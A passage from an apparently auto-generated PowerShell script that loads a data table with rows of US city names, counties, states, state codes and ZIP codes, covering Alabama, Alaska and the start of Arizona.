$Cities.Rows.Add("Lafayette","Chambers","Alabama","AL","1","36862") + $null = $Cities.Rows.Add("Lanett","Chambers","Alabama","AL","1","36863") + $null = $Cities.Rows.Add("Notasulga","Macon","Alabama","AL","1","36866") + $null = $Cities.Rows.Add("Phenix city","Russell","Alabama","AL","1","36867") + $null = $Cities.Rows.Add("Phenix city","Russell","Alabama","AL","1","36869") + $null = $Cities.Rows.Add("Zcta 36870","Lee","Alabama","AL","1","36870") + $null = $Cities.Rows.Add("Pittsview","Russell","Alabama","AL","1","36871") + $null = $Cities.Rows.Add("Salem","Lee","Alabama","AL","1","36874") + $null = $Cities.Rows.Add("Seale","Russell","Alabama","AL","1","36875") + $null = $Cities.Rows.Add("Smiths","Lee","Alabama","AL","1","36877") + $null = $Cities.Rows.Add("Waverly","Lee","Alabama","AL","1","36879") + $null = $Cities.Rows.Add("Zcta 368hh","Chambers","Alabama","AL","1","368HH") + $null = $Cities.Rows.Add("Bellamy","Sumter","Alabama","AL","1","36901") + $null = $Cities.Rows.Add("Butler","Choctaw","Alabama","AL","1","36904") + $null = $Cities.Rows.Add("Cuba","Sumter","Alabama","AL","1","36907") + $null = $Cities.Rows.Add("Gilbertown","Choctaw","Alabama","AL","1","36908") + $null = $Cities.Rows.Add("Jachin","Choctaw","Alabama","AL","1","36910") + $null = $Cities.Rows.Add("Lisman","Choctaw","Alabama","AL","1","36912") + $null = $Cities.Rows.Add("Needham","Choctaw","Alabama","AL","1","36915") + $null = $Cities.Rows.Add("Pennington","Choctaw","Alabama","AL","1","36916") + $null = $Cities.Rows.Add("Silas","Choctaw","Alabama","AL","1","36919") + $null = $Cities.Rows.Add("Toxey","Choctaw","Alabama","AL","1","36921") + $null = $Cities.Rows.Add("Ward","Choctaw","Alabama","AL","1","36922") + $null = $Cities.Rows.Add("York","Sumter","Alabama","AL","1","36925") + $null = $Cities.Rows.Add("Zcta 369hh","Choctaw","Alabama","AL","1","369HH") + $null = $Cities.Rows.Add("Zcta 369xx","Choctaw","Alabama","AL","1","369XX") + $null = $Cities.Rows.Add("","Colbert","Alabama","AL","1","38852") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99501") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99502") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99503") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99504") + $null = $Cities.Rows.Add("Fort richardson","Anchorage Borough","Alaska","AK","2","99505") + $null = $Cities.Rows.Add("Elmendorf afb","Anchorage Borough","Alaska","AK","2","99506") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99507") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99508") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99513") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99515") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99516") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99517") + $null = $Cities.Rows.Add("Anchorage","Anchorage Borough","Alaska","AK","2","99518") + $null = $Cities.Rows.Add("Indian","Anchorage Borough","Alaska","AK","2","99540") + $null = $Cities.Rows.Add("Zcta 99546","Aleutians West Census Area","Alaska","AK","2","99546") + $null = $Cities.Rows.Add("Atka","Aleutians West Census Area","Alaska","AK","2","99547") + $null = $Cities.Rows.Add("Chignik lake","Lake and Peninsula Borough","Alaska","AK","2","99548") + $null = $Cities.Rows.Add("Port heiden","Lake and Peninsula Borough","Alaska","AK","2","99549") + $null = $Cities.Rows.Add("Port lions","Kodiak Island Borough","Alaska","AK","2","99550") + $null = $Cities.Rows.Add("Akiachak","Bethel Census Area","Alaska","AK","2","99551") + $null = $Cities.Rows.Add("Akiak","Bethel Census Area","Alaska","AK","2","99552") + $null = $Cities.Rows.Add("Akutan","Aleutians East Borough","Alaska","AK","2","99553") + $null = $Cities.Rows.Add("Alakanuk","Wade Hampton Census Area","Alaska","AK","2","99554") + $null = $Cities.Rows.Add("Aleknagik","Dillingham Census Area","Alaska","AK","2","99555") + $null = $Cities.Rows.Add("Nikolaevsk","Kenai Peninsula Borough","Alaska","AK","2","99556") + $null = $Cities.Rows.Add("Chuathbaluk","Bethel Census Area","Alaska","AK","2","99557") + $null = $Cities.Rows.Add("Anvik","Yukon-Koyukuk Census Area","Alaska","AK","2","99558") + $null = $Cities.Rows.Add("Atmautluak","Bethel Census Area","Alaska","AK","2","99559") + $null = $Cities.Rows.Add("Chefornak","Bethel Census Area","Alaska","AK","2","99561") + $null = $Cities.Rows.Add("Chevak","Wade Hampton Census Area","Alaska","AK","2","99563") + $null = $Cities.Rows.Add("Chignik","Lake and Peninsula Borough","Alaska","AK","2","99564") + $null = $Cities.Rows.Add("Chignik lagoon","Lake and Peninsula Borough","Alaska","AK","2","99565") + $null = $Cities.Rows.Add("Chitina","Valdez-Cordova Census Area","Alaska","AK","2","99566") + $null = $Cities.Rows.Add("Chugiak","Anchorage Borough","Alaska","AK","2","99567") + $null = $Cities.Rows.Add("Clam gulch","Kenai Peninsula Borough","Alaska","AK","2","99568") + $null = $Cities.Rows.Add("Clarks point","Dillingham Census Area","Alaska","AK","2","99569") + $null = $Cities.Rows.Add("Nelson lagoon","Aleutians East Borough","Alaska","AK","2","99571") + $null = $Cities.Rows.Add("Cooper landing","Kenai Peninsula Borough","Alaska","AK","2","99572") + $null = $Cities.Rows.Add("Copper center","Valdez-Cordova Census Area","Alaska","AK","2","99573") + $null = $Cities.Rows.Add("Chenega bay","Valdez-Cordova Census Area","Alaska","AK","2","99574") + $null = $Cities.Rows.Add("Crooked creek","Bethel Census Area","Alaska","AK","2","99575") + $null = $Cities.Rows.Add("Koliganek","Dillingham Census Area","Alaska","AK","2","99576") + $null = $Cities.Rows.Add("Eagle river","Anchorage Borough","Alaska","AK","2","99577") + $null = $Cities.Rows.Add("Eek","Bethel Census Area","Alaska","AK","2","99578") + $null = $Cities.Rows.Add("Egegik","Lake and Peninsula Borough","Alaska","AK","2","99579") + $null = $Cities.Rows.Add("Ekwok","Dillingham Census Area","Alaska","AK","2","99580") + $null = $Cities.Rows.Add("Emmonak","Wade Hampton Census Area","Alaska","AK","2","99581") + $null = $Cities.Rows.Add("False pass","Aleutians East Borough","Alaska","AK","2","99583") + $null = $Cities.Rows.Add("Marshall","Wade Hampton Census Area","Alaska","AK","2","99585") + $null = $Cities.Rows.Add("Slana","Valdez-Cordova Census Area","Alaska","AK","2","99586") + $null = $Cities.Rows.Add("Girdwood","Anchorage Borough","Alaska","AK","2","99587") + $null = $Cities.Rows.Add("Glennallen","Valdez-Cordova Census Area","Alaska","AK","2","99588") + $null = $Cities.Rows.Add("Goodnews bay","Bethel Census Area","Alaska","AK","2","99589") + $null = $Cities.Rows.Add("Grayling","Yukon-Koyukuk Census Area","Alaska","AK","2","99590") + $null = $Cities.Rows.Add("Saint george isl","Aleutians West Census Area","Alaska","AK","2","99591") + $null = $Cities.Rows.Add("Zcta 995hh","Aleutians East Borough","Alaska","AK","2","995HH") + $null = $Cities.Rows.Add("Zcta 995xx","Valdez-Cordova Census Area","Alaska","AK","2","995XX") + $null = $Cities.Rows.Add("Holy cross","Yukon-Koyukuk Census Area","Alaska","AK","2","99602") + $null = $Cities.Rows.Add("Port graham","Kenai Peninsula Borough","Alaska","AK","2","99603") + $null = $Cities.Rows.Add("Hooper bay","Wade Hampton Census Area","Alaska","AK","2","99604") + $null = $Cities.Rows.Add("Hope","Kenai Peninsula Borough","Alaska","AK","2","99605") + $null = $Cities.Rows.Add("Kokhanok","Lake and Peninsula Borough","Alaska","AK","2","99606") + $null = $Cities.Rows.Add("Kalskag","Bethel Census Area","Alaska","AK","2","99607") + $null = $Cities.Rows.Add("Karluk","Kodiak Island Borough","Alaska","AK","2","99608") + $null = $Cities.Rows.Add("Kasigluk","Bethel Census Area","Alaska","AK","2","99609") + $null = $Cities.Rows.Add("Kasilof","Kenai Peninsula Borough","Alaska","AK","2","99610") + $null = $Cities.Rows.Add("Kenai","Kenai Peninsula Borough","Alaska","AK","2","99611") + $null = $Cities.Rows.Add("King cove","Aleutians East Borough","Alaska","AK","2","99612") + $null = $Cities.Rows.Add("Igiugig","Bristol Bay Borough","Alaska","AK","2","99613") + $null = $Cities.Rows.Add("Kipnuk","Bethel Census Area","Alaska","AK","2","99614") + $null = $Cities.Rows.Add("Akhiok","Kodiak Island Borough","Alaska","AK","2","99615") + $null = $Cities.Rows.Add("Kotlik","Wade Hampton Census Area","Alaska","AK","2","99620") + $null = $Cities.Rows.Add("Kwethluk","Bethel Census Area","Alaska","AK","2","99621") + $null = $Cities.Rows.Add("Kwigillingok","Bethel Census Area","Alaska","AK","2","99622") + $null = $Cities.Rows.Add("Larsen bay","Kodiak Island Borough","Alaska","AK","2","99624") + $null = $Cities.Rows.Add("Levelock","Lake and Peninsula Borough","Alaska","AK","2","99625") + $null = $Cities.Rows.Add("Lower kalskag","Bethel Census Area","Alaska","AK","2","99626") + $null = $Cities.Rows.Add("Mc grath","Yukon-Koyukuk Census Area","Alaska","AK","2","99627") + $null = $Cities.Rows.Add("Manokotak","Dillingham Census Area","Alaska","AK","2","99628") + $null = $Cities.Rows.Add("Mekoryuk","Bethel Census Area","Alaska","AK","2","99630") + $null = $Cities.Rows.Add("Moose pass","Kenai Peninsula Borough","Alaska","AK","2","99631") + $null = $Cities.Rows.Add("Mountain village","Wade Hampton Census Area","Alaska","AK","2","99632") + $null = $Cities.Rows.Add("Naknek","Bristol Bay Borough","Alaska","AK","2","99633") + $null = $Cities.Rows.Add("Napakiak","Bethel Census Area","Alaska","AK","2","99634") + $null = $Cities.Rows.Add("Nikiski","Kenai Peninsula Borough","Alaska","AK","2","99635") + $null = $Cities.Rows.Add("New stuyahok","Dillingham Census Area","Alaska","AK","2","99636") + $null = $Cities.Rows.Add("Toksook bay","Bethel Census Area","Alaska","AK","2","99637") + $null = $Cities.Rows.Add("Nikolski","Aleutians West Census Area","Alaska","AK","2","99638") + $null = $Cities.Rows.Add("Ninilchik","Kenai Peninsula Borough","Alaska","AK","2","99639") + $null = $Cities.Rows.Add("Nondalton","Lake and Peninsula Borough","Alaska","AK","2","99640") + $null = $Cities.Rows.Add("Nunapitchuk","Bethel Census Area","Alaska","AK","2","99641") + $null = $Cities.Rows.Add("Old harbor","Kodiak Island Borough","Alaska","AK","2","99643") + $null = $Cities.Rows.Add("Ouzinkie","Kodiak Island Borough","Alaska","AK","2","99644") + $null = $Cities.Rows.Add("Butte","Matanuska-Susitna Borough","Alaska","AK","2","99645") + $null = $Cities.Rows.Add("Pedro bay","Lake and Peninsula Borough","Alaska","AK","2","99647") + $null = $Cities.Rows.Add("Perryville","Lake and Peninsula Borough","Alaska","AK","2","99648") + $null = $Cities.Rows.Add("Pilot point","Lake and Peninsula Borough","Alaska","AK","2","99649") + $null = $Cities.Rows.Add("Pilot station","Wade Hampton Census Area","Alaska","AK","2","99650") + $null = $Cities.Rows.Add("Platinum","Bethel Census Area","Alaska","AK","2","99651") + $null = $Cities.Rows.Add("Big lake","Matanuska-Susitna Borough","Alaska","AK","2","99652") + $null = $Cities.Rows.Add("Port alsworth","Lake and Peninsula Borough","Alaska","AK","2","99653") + $null = $Cities.Rows.Add("Wasilla","Matanuska-Susitna Borough","Alaska","AK","2","99654") + $null = $Cities.Rows.Add("Quinhagak","Bethel Census Area","Alaska","AK","2","99655") + $null = $Cities.Rows.Add("Red devil","Bethel Census Area","Alaska","AK","2","99656") + $null = $Cities.Rows.Add("Russian mission","Wade Hampton Census Area","Alaska","AK","2","99657") + $null = $Cities.Rows.Add("Saint marys","Wade Hampton Census Area","Alaska","AK","2","99658") + $null = $Cities.Rows.Add("Saint michael","Nome Census Area","Alaska","AK","2","99659") + $null = $Cities.Rows.Add("Saint paul islan","Aleutians West Census Area","Alaska","AK","2","99660") + $null = $Cities.Rows.Add("Sand point","Aleutians East Borough","Alaska","AK","2","99661") + $null = $Cities.Rows.Add("Scammon bay","Wade Hampton Census Area","Alaska","AK","2","99662") + $null = $Cities.Rows.Add("Seldovia","Kenai Peninsula Borough","Alaska","AK","2","99663") + $null = $Cities.Rows.Add("Seward","Kenai Peninsula Borough","Alaska","AK","2","99664") + $null = $Cities.Rows.Add("Shageluk","Yukon-Koyukuk Census Area","Alaska","AK","2","99665") + $null = $Cities.Rows.Add("Sheldon point","Wade Hampton Census Area","Alaska","AK","2","99666") + $null = $Cities.Rows.Add("Skwentna","Matanuska-Susitna Borough","Alaska","AK","2","99667") + $null = $Cities.Rows.Add("Sleetmute","Bethel Census Area","Alaska","AK","2","99668") + $null = $Cities.Rows.Add("Soldotna","Kenai Peninsula Borough","Alaska","AK","2","99669") + $null = $Cities.Rows.Add("South naknek","Bristol Bay Borough","Alaska","AK","2","99670") + $null = $Cities.Rows.Add("Stebbins","Nome Census Area","Alaska","AK","2","99671") + $null = $Cities.Rows.Add("Sterling","Kenai Peninsula Borough","Alaska","AK","2","99672") + $null = $Cities.Rows.Add("Chickaloon","Matanuska-Susitna Borough","Alaska","AK","2","99674") + $null = $Cities.Rows.Add("Takotna","Yukon-Koyukuk Census Area","Alaska","AK","2","99675") + $null = $Cities.Rows.Add("Talkeetna","Matanuska-Susitna Borough","Alaska","AK","2","99676") + $null = $Cities.Rows.Add("Tatitlek","Valdez-Cordova Census Area","Alaska","AK","2","99677") + $null = $Cities.Rows.Add("Togiak","Dillingham Census Area","Alaska","AK","2","99678") + $null = $Cities.Rows.Add("Tuluksak","Bethel Census Area","Alaska","AK","2","99679") + $null = $Cities.Rows.Add("Tuntutuliak","Bethel Census Area","Alaska","AK","2","99680") + $null = $Cities.Rows.Add("Tununak","Bethel Census Area","Alaska","AK","2","99681") + $null = $Cities.Rows.Add("Tyonek","Kenai Peninsula Borough","Alaska","AK","2","99682") + $null = $Cities.Rows.Add("Trapper creek","Matanuska-Susitna Borough","Alaska","AK","2","99683") + $null = $Cities.Rows.Add("Unalakleet","Nome Census Area","Alaska","AK","2","99684") + $null = $Cities.Rows.Add("Unalaska","Aleutians West Census Area","Alaska","AK","2","99685") + $null = $Cities.Rows.Add("Valdez","Valdez-Cordova Census Area","Alaska","AK","2","99686") + $null = $Cities.Rows.Add("Wasilla","Matanuska-Susitna Borough","Alaska","AK","2","99687") + $null = $Cities.Rows.Add("Willow","Matanuska-Susitna Borough","Alaska","AK","2","99688") + $null = $Cities.Rows.Add("Yakutat","Yakutat Borou","Alaska","AK","2","99689") + $null = $Cities.Rows.Add("Nightmute","Bethel Census Area","Alaska","AK","2","99690") + $null = $Cities.Rows.Add("Nikolai","Yukon-Koyukuk Census Area","Alaska","AK","2","99691") + $null = $Cities.Rows.Add("Dutch harbor","Aleutians West Census Area","Alaska","AK","2","99692") + $null = $Cities.Rows.Add("Whittier","Valdez-Cordova Census Area","Alaska","AK","2","99693") + $null = $Cities.Rows.Add("Houston","Matanuska-Susitna Borough","Alaska","AK","2","99694") + $null = $Cities.Rows.Add("Anchorage","Matanuska-Susitna Borough","Alaska","AK","2","99695") + $null = $Cities.Rows.Add("Kodiak","Kodiak Island Borough","Alaska","AK","2","99697") + $null = $Cities.Rows.Add("Zcta 996hh","Aleutians East Borough","Alaska","AK","2","996HH") + $null = $Cities.Rows.Add("Zcta 996xx","Yakutat Borou","Alaska","AK","2","996XX") + $null = $Cities.Rows.Add("Coldfoot","Fairbanks North Star Borough","Alaska","AK","2","99701") + $null = $Cities.Rows.Add("Eielson afb","Fairbanks North Star Borough","Alaska","AK","2","99702") + $null = $Cities.Rows.Add("Fort wainwright","Fairbanks North Star Borough","Alaska","AK","2","99703") + $null = $Cities.Rows.Add("Clear","Denali Borough","Alaska","AK","2","99704") + $null = $Cities.Rows.Add("North pole","Fairbanks North Star Borough","Alaska","AK","2","99705") + $null = $Cities.Rows.Add("Fairbanks","Fairbanks North Star Borough","Alaska","AK","2","99709") + $null = $Cities.Rows.Add("Fairbanks","Fairbanks North Star Borough","Alaska","AK","2","99712") + $null = $Cities.Rows.Add("Salcha","Fairbanks North Star Borough","Alaska","AK","2","99714") + $null = $Cities.Rows.Add("Allakaket","Yukon-Koyukuk Census Area","Alaska","AK","2","99720") + $null = $Cities.Rows.Add("Anaktuvuk pass","North Slope Borough","Alaska","AK","2","99721") + $null = $Cities.Rows.Add("Arctic village","Yukon-Koyukuk Census Area","Alaska","AK","2","99722") + $null = $Cities.Rows.Add("Barrow","North Slope Borough","Alaska","AK","2","99723") + $null = $Cities.Rows.Add("Beaver","Yukon-Koyukuk Census Area","Alaska","AK","2","99724") + $null = $Cities.Rows.Add("Ester","Fairbanks North Star Borough","Alaska","AK","2","99725") + $null = $Cities.Rows.Add("Bettles field","Yukon-Koyukuk Census Area","Alaska","AK","2","99726") + $null = $Cities.Rows.Add("Buckland","Northwest Arctic Borough","Alaska","AK","2","99727") + $null = $Cities.Rows.Add("Cantwell","Denali Borough","Alaska","AK","2","99729") + $null = $Cities.Rows.Add("Central","Yukon-Koyukuk Census Area","Alaska","AK","2","99730") + $null = $Cities.Rows.Add("Chicken","Southeast Fairbanks Census Area","Alaska","AK","2","99732") + $null = $Cities.Rows.Add("Circle","Yukon-Koyukuk Census Area","Alaska","AK","2","99733") + $null = $Cities.Rows.Add("Deering","Northwest Arctic Borough","Alaska","AK","2","99736") + $null = $Cities.Rows.Add("Dot lake","Southeast Fairbanks Census Area","Alaska","AK","2","99737") + $null = $Cities.Rows.Add("Eagle","Southeast Fairbanks Census Area","Alaska","AK","2","99738") + $null = $Cities.Rows.Add("Elim","Nome Census Area","Alaska","AK","2","99739") + $null = $Cities.Rows.Add("Fort yukon","Yukon-Koyukuk Census Area","Alaska","AK","2","99740") + $null = $Cities.Rows.Add("Galena","Yukon-Koyukuk Census Area","Alaska","AK","2","99741") + $null = $Cities.Rows.Add("Gambell","Nome Census Area","Alaska","AK","2","99742") + $null = $Cities.Rows.Add("Healy","Denali Borough","Alaska","AK","2","99743") + $null = $Cities.Rows.Add("Anderson","Denali Borough","Alaska","AK","2","99744") + $null = $Cities.Rows.Add("Hughes","Yukon-Koyukuk Census Area","Alaska","AK","2","99745") + $null = $Cities.Rows.Add("Huslia","Yukon-Koyukuk Census Area","Alaska","AK","2","99746") + $null = $Cities.Rows.Add("Kaktovik","North Slope Borough","Alaska","AK","2","99747") + $null = $Cities.Rows.Add("Kaltag","Yukon-Koyukuk Census Area","Alaska","AK","2","99748") + $null = $Cities.Rows.Add("Kiana","Northwest Arctic Borough","Alaska","AK","2","99749") + $null = $Cities.Rows.Add("Kivalina","Northwest Arctic Borough","Alaska","AK","2","99750") + $null = $Cities.Rows.Add("Kobuk","Northwest Arctic Borough","Alaska","AK","2","99751") + $null = $Cities.Rows.Add("Kotzebue","Northwest Arctic Borough","Alaska","AK","2","99752") + $null = $Cities.Rows.Add("Koyuk","Nome Census Area","Alaska","AK","2","99753") + $null = $Cities.Rows.Add("Koyukuk","Yukon-Koyukuk Census Area","Alaska","AK","2","99754") + $null = $Cities.Rows.Add("Denali national","Denali Borough","Alaska","AK","2","99755") + $null = $Cities.Rows.Add("Manley hot sprin","Yukon-Koyukuk Census Area","Alaska","AK","2","99756") + $null = $Cities.Rows.Add("Lake minchumina","Yukon-Koyukuk Census Area","Alaska","AK","2","99757") + $null = $Cities.Rows.Add("Minto","Yukon-Koyukuk Census Area","Alaska","AK","2","99758") + $null = $Cities.Rows.Add("Point lay","North Slope Borough","Alaska","AK","2","99759") + $null = $Cities.Rows.Add("Nenana","Yukon-Koyukuk Census Area","Alaska","AK","2","99760") + $null = $Cities.Rows.Add("Noatak","Northwest Arctic Borough","Alaska","AK","2","99761") + $null = $Cities.Rows.Add("Golovin","Nome Census Area","Alaska","AK","2","99762") + $null = $Cities.Rows.Add("Noorvik","Northwest Arctic Borough","Alaska","AK","2","99763") + $null = $Cities.Rows.Add("Northway","Southeast Fairbanks Census Area","Alaska","AK","2","99764") + $null = $Cities.Rows.Add("Nulato","Yukon-Koyukuk Census Area","Alaska","AK","2","99765") + $null = $Cities.Rows.Add("Point hope","North Slope Borough","Alaska","AK","2","99766") + $null = $Cities.Rows.Add("Rampart","Yukon-Koyukuk Census Area","Alaska","AK","2","99767") + $null = $Cities.Rows.Add("Ruby","Yukon-Koyukuk Census Area","Alaska","AK","2","99768") + $null = $Cities.Rows.Add("Savoonga","Nome Census Area","Alaska","AK","2","99769") + $null = $Cities.Rows.Add("Selawik","Northwest Arctic Borough","Alaska","AK","2","99770") + $null = $Cities.Rows.Add("Shaktoolik","Nome Census Area","Alaska","AK","2","99771") + $null = $Cities.Rows.Add("Shishmaref","Nome Census Area","Alaska","AK","2","99772") + $null = $Cities.Rows.Add("Shungnak","Northwest Arctic Borough","Alaska","AK","2","99773") + $null = $Cities.Rows.Add("Stevens village","Yukon-Koyukuk Census Area","Alaska","AK","2","99774") + $null = $Cities.Rows.Add("Fairbanks","Fairbanks North Star Borough","Alaska","AK","2","99775") + $null = $Cities.Rows.Add("Tanacross","Southeast Fairbanks Census Area","Alaska","AK","2","99776") + $null = $Cities.Rows.Add("Tanana","Yukon-Koyukuk Census Area","Alaska","AK","2","99777") + $null = $Cities.Rows.Add("Teller","Nome Census Area","Alaska","AK","2","99778") + $null = $Cities.Rows.Add("Tetlin","Southeast Fairbanks Census Area","Alaska","AK","2","99779") + $null = $Cities.Rows.Add("Border","Southeast Fairbanks Census Area","Alaska","AK","2","99780") + $null = $Cities.Rows.Add("Venetie","Yukon-Koyukuk Census Area","Alaska","AK","2","99781") + $null = $Cities.Rows.Add("Wainwright","North Slope Borough","Alaska","AK","2","99782") + $null = $Cities.Rows.Add("Wales","Nome Census Area","Alaska","AK","2","99783") + $null = $Cities.Rows.Add("White mountain","Nome Census Area","Alaska","AK","2","99784") + $null = $Cities.Rows.Add("Brevig mission","Nome Census Area","Alaska","AK","2","99785") + $null = $Cities.Rows.Add("Ambler","Northwest Arctic Borough","Alaska","AK","2","99786") + $null = $Cities.Rows.Add("Chalkyitsik","Yukon-Koyukuk Census Area","Alaska","AK","2","99788") + $null = $Cities.Rows.Add("Nuiqsut","North Slope Borough","Alaska","AK","2","99789") + $null = $Cities.Rows.Add("Atqasuk","North Slope Borough","Alaska","AK","2","99791") + $null = $Cities.Rows.Add("Zcta 997hh","Denali Borough","Alaska","AK","2","997HH") + $null = $Cities.Rows.Add("Zcta 997xx","Northwest Arctic Borough","Alaska","AK","2","997XX") + $null = $Cities.Rows.Add("Juneau","Juneau Borough","Alaska","AK","2","99801") + $null = $Cities.Rows.Add("Angoon","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99820") + $null = $Cities.Rows.Add("Douglas","Juneau Borough","Alaska","AK","2","99824") + $null = $Cities.Rows.Add("Elfin cove","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99825") + $null = $Cities.Rows.Add("Gustavus","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99826") + $null = $Cities.Rows.Add("Haines","Haines Borough","Alaska","AK","2","99827") + $null = $Cities.Rows.Add("Hoonah","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99829") + $null = $Cities.Rows.Add("Kake","Wrangell-Petersburg Census Area","Alaska","AK","2","99830") + $null = $Cities.Rows.Add("Pelican","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99832") + $null = $Cities.Rows.Add("Petersburg","Wrangell-Petersburg Census Area","Alaska","AK","2","99833") + $null = $Cities.Rows.Add("Sitka","Sitka Borough","Alaska","AK","2","99835") + $null = $Cities.Rows.Add("Skagway","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99840") + $null = $Cities.Rows.Add("Tenakee springs","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","99841") + $null = $Cities.Rows.Add("Juneau","Haines Borough","Alaska","AK","2","99850") + $null = $Cities.Rows.Add("Zcta 998hh","Haines Borough","Alaska","AK","2","998HH") + $null = $Cities.Rows.Add("Zcta 998xx","Skagway-Hoonah-Angoon Census Area","Alaska","AK","2","998XX") + $null = $Cities.Rows.Add("Ketchikan","Ketchikan Gateway Borough","Alaska","AK","2","99901") + $null = $Cities.Rows.Add("Meyers chuck","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99903") + $null = $Cities.Rows.Add("Coffman cove","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99918") + $null = $Cities.Rows.Add("Thorne bay","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99919") + $null = $Cities.Rows.Add("Craig","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99921") + $null = $Cities.Rows.Add("Hydaburg","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99922") + $null = $Cities.Rows.Add("Hyder","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99923") + $null = $Cities.Rows.Add("Klawock","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99925") + $null = $Cities.Rows.Add("Metlakatla","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99926") + $null = $Cities.Rows.Add("Point baker","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","99927") + $null = $Cities.Rows.Add("Wrangell","Wrangell-Petersburg Census Area","Alaska","AK","2","99929") + $null = $Cities.Rows.Add("Ketchikan","Ketchikan Gateway Borough","Alaska","AK","2","99950") + $null = $Cities.Rows.Add("Zcta 999hh","Ketchikan Gateway Borough","Alaska","AK","2","999HH") + $null = $Cities.Rows.Add("Zcta 999xx","Prince of Wales-Outer Ketchikan Census","Alaska","AK","2","999XX") + $null = $Cities.Rows.Add("","Navajo","Arizona","AZ","4","84536") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85003") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85004") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85006") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85007") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85008") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85009") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85012") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85013") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85014") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85015") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85016") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85017") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85018") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85019") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85020") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85021") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85022") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85023") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85024") + $null = $Cities.Rows.Add("New river stage","Maricopa","Arizona","AZ","4","85027") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85028") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85029") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85031") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85032") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85033") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85034") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85035") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85037") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85040") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85041") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85043") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85044") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85045") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85048") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85050") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85051") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85053") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85054") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85085") + $null = $Cities.Rows.Add("Phoenix","Maricopa","Arizona","AZ","4","85086") + $null = $Cities.Rows.Add("Zcta 85087","Maricopa","Arizona","AZ","4","85087") + $null = $Cities.Rows.Add("Zcta 850hh","Maricopa","Arizona","AZ","4","850HH") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85201") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85202") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85203") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85204") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85205") + $null = $Cities.Rows.Add("Mesa","Maricopa","Arizona","AZ","4","85206") + $null = 